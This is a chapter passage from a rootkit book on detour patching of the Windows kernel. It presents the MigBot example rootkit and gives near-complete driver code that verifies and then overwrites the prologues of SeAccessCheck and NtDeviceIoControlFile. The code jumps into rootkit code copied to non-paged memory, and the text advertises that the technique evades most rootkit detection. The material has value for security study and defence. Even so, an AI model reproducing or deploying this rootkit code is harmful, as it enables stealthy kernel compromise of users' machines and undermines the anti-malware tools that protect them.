Detour Patching | Rootkits: Subverting the Windows Kernel

< Day Day Up >

In Chapter 4, we saw the power of using call hooks as a convenient way to modify program behavior. One downside of the call hook is that it modifies call tables, and this can be detected by anti-virus and anti-rootkit technology. A subtler approach to the problem is to patch the bytes within the function itself by inserting a jump into rootkit code. Additionally, modifying just a single function can affect multiple tables pointing to that function, without the need to keep track of all the tables that point to the function. This technique is called detour patching, and can be used to reroute the control flow around a function.

Figure 5-1 illustrates how code is inserted by the rootkit into the control flow.

Figure 5-1. Modification of control flow.

As with a call hook, we can insert rootkit code to modify arguments before and after a system call or function call. We can also make the original function call as if it had never been patched. Finally, we can rewrite the logic of the function call altogether. For example, we can make the call always return a certain error code.

Detour patching is best illustrated by example. The technique requires several steps which are detailed in the following sections.

Rerouting the Control Flow Using MigBot

Migbot is an example rootkit that illustrates detour patches on kernel functions.

Rootkit.com

MigBot can be downloaded from rootkit.com at: www.rootkit.com/vault/hoglund/migbot.zip

MigBot reroutes the control flow from two important kernel functions: NtDeviceIoControlFile, and SeAccessCheck.

Rerouting a function requires first finding the function in memory. An advantage of the two functions we have chosen is that they are exported. This makes them easier to locate, because there is a table in the PE header where we can perform a lookup to find them. In the code for MigBot, we simply refer to the functions by their exported names. Because they are exported, there is no need to hunt through PE headers and such.^[1]

^[1] The technique of hunting through PE headers is covered in Chapters 4 and 10.

It is more involved to patch a function that is not exported: It may require searching memory for unique byte sequences in order to find the desired function.

Once we have a pointer to the function, the next step is to know exactly what we're overwriting. Changing op codes in memory is destructive. If you install a far jump, you will overwrite at least 7 bytes of memory destroying any instructions that previously existed there. Later, you will need to recreate the logic or restore those instructions somehow.

Instruction alignment is also a problem (especially with the Intel x86 instruction set). Not all instructions are of the same length. For example, a PUSH instruction might be only one byte long, and a JMP instruction might be seven bytes long!

In our example, we wish to overwrite seven bytes of data, but the instructions we will be overwriting take up more than seven bytes of space. Therefore, if we patch only the seven bytes, we end up leaving in place a half-bitten chunk of the last instruction we overwrite a "crumb," if you will. The partial instruction left behind, in fact, is just corruption at this point. The CPU will get very confused if it tries to execute a corrupted instruction; in other words, it will cause a crash, and the user will see a Blue Screen of Death.

Leaving a little "chunk" behind, then, would really mess things up. Because a partial instruction would be misinterpreted by the processor and cause your code to crash, you will need to NOP out any crumbs that are left behind. In other words, you must overwrite to the nearest aligned instruction border. It's a Good Thing that the NOP is only one byte long this makes it very easy to patch out code bytes. In fact, this is by design: The NOP instruction was made 1 byte long specifically so it would provide more utility for patching code (in other words, Someone Who Came Before Us Thought of This).

Figure 5-2 illustrates the overwrite process. The new instruction, a far jmp, is inserted along with two NOP instructions in order to pad out the patch without leaving a "crumb" behind.

Figure 5-2. Procedure for code patching.

To successfully patch over instructions without causing corruption, it is also necessary to ensure that the patch is applied to the correct version and location in memory. This step requires special attention because the target software may be patched, or different versions of the code may exist. If we don't perform some sanity checking, we may patch the wrong version, causing corruption and crashes.

Checking for Function Bytes

Before we overwrite a function with a jump, we need to perform various checks to make sure the function is the one we expect it to be. Verifying that it has the same name, for example, is not sufficient: What if the OS is a different version of Windows ("home" versus "professional" edition, for example) than the one for which the rootkit was written? Or, what if a service pack had been installed and has changed the function? It is even possible that another program has already set up camp and patched the function before us. Modifying the code bytes of the function without first checking to ensure that the function is as expected could result in corruption and a subsequent Blue Screen of Death.

MigBot includes two steps for checking function bytes. The first retrieves a pointer to the function, and the second performs a simple byte comparison to a hard-coded value we expect to find there. You can determine what bytes are there by using SoftIce or another kernel debugger, or by disassembling the binary with a tool such as IDA Pro.

Make sure you keep track of the length of the byte sequence being tested. Notice in the following code that one sequence is 8 bytes long, and the other is 9 bytes long:

 NTSTATUS CheckFunctionBytesNtDeviceIoControlFile() {   int i=0;   char *p = (char *)NtDeviceIoControlFile; //The beginning of the NtDeviceIoControlFile function //should match: //55   PUSH EBP //8BEC  MOV  EBP, ESP //6A01  PUSH 01 //FF752C  PUSH DWORD PTR [EBP + 2C]   char c[] = { 0x55, 0x8B, 0xEC, 0x6A, 0x01, 0xFF, 0x75, 0x2C };   while(i<8)   {    DbgPrint(" - 0x%02X ", (unsigned char)p[i]);    if(p[i] != c[i])    {      return STATUS_UNSUCCESSFUL;    }    i++;   }   return STATUS_SUCCESS; } NTSTATUS CheckFunctionBytesSeAccessCheck() {   int i=0;   char *p = (char *)SeAccessCheck; //The beginning of the SeAccessCheck function //should match: //55   PUSH EBP //8BEC  MOV EBP, ESP //53   PUSH EBX //33DB  XOR EBX, EBX //385D24  CMP [EBP+24], BL   char c[] = { 0x55, 0x8B, 0xEC, 0x53, 0x33, 0xDB, 0x38, 0x5D, 0x24 };   while(i<9)   {    DbgPrint(" - 0x%02X ", (unsigned char)p[i]);    if(p[i] != c[i])    {      return STATUS_UNSUCCESSFUL;    }    i++;   }   return STATUS_SUCCESS; }

Keeping Track of the Overwritten Instructions

Once you overwrite these instructions with your patch, the instructions are gone! But consider that these instructions do something important they modify the stack and set up some registers. If we later wish to run the original function, we will need to execute the missing instructions.

Since we know exactly what instructions we removed, we can store them in another location and execute them before branching back to the original function. Figure 5-3 illustrates this technique.

Figure 5-3. Executing the removed instructions.

After the detour has taken place, Migbot simply branches back to the original function. This is a template you can use to insert whatever code you choose.

The rootkit code is written as a function, but the function is declared as "naked." This prevents the compiler from putting any extra opcodes into the function. This is important, since we don't want to corrupt the stack or any registers. You can see in the following code that the missing instructions are executed, and then a far jump takes place.

Of special note is the technique used to code the far jump. Since the author could not figure out the syntax for a far jump using the DDK compiler, he instead used the emit keyword to force bytes to be output. This is a useful technique not just for encoding an obscure instruction, but also for self-modifying code and hard-inserted strings.

 // Naked functions have no prolog/epilog code- // they are functionally like the // target of a goto statement __declspec(naked) my_function_detour_seaccesscheck() {   __asm   {    // exec missing instructions    push  ebp    mov   ebp, esp    push  ebx    xor   ebx, ebx    cmp   [ebp+24], bl    // Jump to reentry location in hooked function.    // This gets "stamped" with the correct address    // at runtime.    //    // We need to hard-code a far jmp, but the assembler    // that comes with the DDK will not assemble this out    // for us, so we code it manually.    // jmp FAR 0x08:0xAAAAAAAA    _emit 0xEA    _emit 0xAA    _emit 0xAA    _emit 0xAA    _emit 0xAA    _emit 0x08    _emit 0x00   } } // We read this function into non-paged memory // before we place the detour. It seems that the // driver code gets paged now and then, which is bad // for children and other living things. __declspec(naked) my_function_detour_ntdeviceiocontrolfile() {   __asm   {    // exec missing instructions    push  ebp    mov   ebp, esp    push  0x01    push  dword ptr [ebp+0x2C]    // Jump to reentry location in hooked function.    // This gets "stamped" with the correct address    // at runtime.    //    // We need to hard-code a far jmp, but the assembler    // that comes with the DDK will not assemble this out    // for us, so we code it manually    // jmp FAR 0x08:0xAAAAAAAA    _emit 0xEA    _emit 0xAA    _emit 0xAA    _emit 0xAA    _emit 0xAA    _emit 0x08    _emit 0x00   } }

Using NonPagedPool Memory

The code for your rootkit function resides in your driver memory. However, it does not need to stay there. Especially if your driver is going to be pageable, your rootkit code needs to be moved into a location where it will never be paged out. This is NonPagedPool memory. An interesting added benefit is that once the rootkit code has been placed in NonPagedPool, the driver itself can be unloaded, as the rootkit driver must be loaded only long enough to apply the patch. The MigBot example uses NonPagedPool to store rootkit code, as does the jump-template technique detailed later in this chapter.

Runtime Address Fixups

You will notice in the following code that we have FAR JMP instructions that jump to the addresses 0xAAAAAAAA and 0x11223344. These values are clearly not valid but this is on purpose. The values are to be replaced with valid addresses when the patch is placed. These values cannot be hard coded because they change at runtime. The rootkit can determine the correct addresses needed, and can "stamp in" the correct values at runtime.

 VOID DetourFunctionSeAccessCheck() {   char *actual_function = (char *)SeAccessCheck;   char *non_paged_memory;   unsigned long detour_address;   unsigned long reentry_address;   int i = 0;

The following code will be written over the original instructions. Note the use of the NOP instructions to pad out the distance:

 // Assembles to jmp far 0008:11223344 where 11223344 // is the address of our detour function plus two NOPs // to align the patch.   char newcode[] = { 0xEA, 0x44, 0x33, 0x22, 0x11,  0x08, 0x00, 0x90, 0x90 };

Now a reentry address is calculated. This is the address in the original function that immediately follows the patched location. Notice that we add 9 (the length of the patch) to the function pointer to obtain this address:

 // Reentering the hooked function at a location past the // overwritten opcodes alignment is, of course, very // important here.    reentry_address = ((unsigned long)SeAccessCheck) + 9;

Now some NonPagedPool is allocated enough to store the rootkit code. Next, the rootkit code is copied into the newly allocated memory. The detour patch will then branch to this new code location. The contents of the rootkit code (the naked function we declared earlier) are copied, byte for byte, into the NonPagedPool memory. The pointer to the beginning of this new copy of the function is stored.

 non_paged_memory = ExAllocatePool(NonPagedPool, 256); // Copy contents of our function into non-paged memory // with a cap at 256 bytes. // (Beware of possible read off end of page FIXME.)   for(i=0;i<256;i++)   {    ((unsigned char *)non_paged_memory)[i] =  ((unsigned char *)my_function_detour_seaccesscheck)[i];   }   detour_address = (unsigned long)non_paged_memory;

Now it's time for a little magic. The address of our new copy of the rootkit function is placed into the patch, so the patch will properly FAR JMP to the rootkit code instead of to 0x11223344:

 // stamp in the target address of the far jmp   *( (unsigned long *)(&newcode[1]) ) = detour_address;

Again, another address fixup: This time, in the rootkit code we search for the 0xAAAAAAAA address. When we find it, we replace it with the reentry address calculated earlier. Again, this is the address in the original function that immediately follows the patched location.

 // Now, "stamp in" the return jmp into our // detour function:   for(i=0;i<200;i++)   {    if( (0xAA == ((unsigned char *)non_paged_memory)[i]) &&      (0xAA == ((unsigned char *)non_paged_memory)[i+1]) &&      (0xAA == ((unsigned char *)non_paged_memory)[i+2]) &&      (0xAA == ((unsigned char *)non_paged_memory)[i+3]))    {      // we found the address 0xAAAAAAAA      // stamp it w/ the correct address      *( (unsigned long *)(&non_paged_memory[i]) ) =        reentry_address;      break;    }   } // TODO, raise IRQL // Overwrite the bytes in the kernel function // to apply the detour jmp.   for(i=0;i < 9;i++)   {    actual_function[i] = newcode[i];   } // TODO, drop IRQL } // The same logic is applied to the NtDeviceIoControl patch: VOID DetourFunctionNtDeviceIoControlFile() {   char *actual_function = (char *)NtDeviceIoControlFile;   char *non_paged_memory;   unsigned long detour_address;   unsigned long reentry_address;   int i = 0; // Assembles to jmp far 0008:11223344 where 11223344 // is the address of our detour function, plus one NOP // to align the patch.   char newcode[] = { 0xEA, 0x44, 0x33, 0x22, 0x11,  0x08, 0x00, 0x90 }; // Reentering the hooked function at a location past // the overwritten opcodes alignment is, of course, // very important here.   reentry_address = ((unsigned long)NtDeviceIoControlFile) + 8;   non_paged_memory = ExAllocatePool(NonPagedPool, 256); // Copy contents of our function into non-paged memory // with a cap at 256 bytes (beware of possible read // off end of page FIXME).   for(i=0;i<256;i++)   { ((unsigned char *)non_paged_memory)[i] = ((unsigned char *) my_function_detour_ntdeviceiocontrolfile)[i];   }   detour_address = (unsigned long)non_paged_memory; // Stamp in the target address of the far jmp.   *( (unsigned long *)(&newcode[1]) ) = detour_address; // Now, stamp in the return jmp into our // detour function.   for(i=0;i<200;i++)   {    if( (0xAA == ((unsigned char *)non_paged_memory)[i]) &&      (0xAA == ((unsigned char *)non_paged_memory)[i+1]) &&      (0xAA == ((unsigned char *)non_paged_memory)[i+2]) &&      (0xAA == ((unsigned char *)non_paged_memory)[i+3]))    {      // We found the address 0xAAAAAAAA;      // stamp it with the correct address.      *( (unsigned long *)(&non_paged_memory[i]) ) =   reentry_address;      break;    }   } // TODO, raise IRQL // Overwrite the bytes in the kernel function // to apply the detour jmp.   for(i=0;i < 8;i++)   {    actual_function[i] = newcode[i];   } // TODO, drop IRQL }

The DriverEntry routine simply checks for the correct function bytes and then applies the detour patches:

 NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject,   IN PUNICODE_STRING theRegistryPath ) {   DbgPrint("My Driver Loaded!");   if(STATUS_SUCCESS != CheckFunctionBytesNtDeviceIoControlFile())   {    DbgPrint("Match Failure on NtDeviceIoControlFile!");    return STATUS_UNSUCCESSFUL;   }   if(STATUS_SUCCESS != CheckFunctionBytesSeAccessCheck())   {    DbgPrint("Match Failure on SeAccessCheck!");    return STATUS_UNSUCCESSFUL;   }   DetourFunctionNtDeviceIoControlFile();   DetourFunctionSeAccessCheck();   return STATUS_SUCCESS; }

You have now learned a powerful technique of detour patching. The example code has given you the basic tools required to use this technique. From these basic tools, you can craft more-complex attacks and modifications against code. The technique is very strong, and can easily evade most rootkit-detection technologies.

The next section will detail a slightly different way to use code patches in order to hook the interrupt table.

< Day Day Up >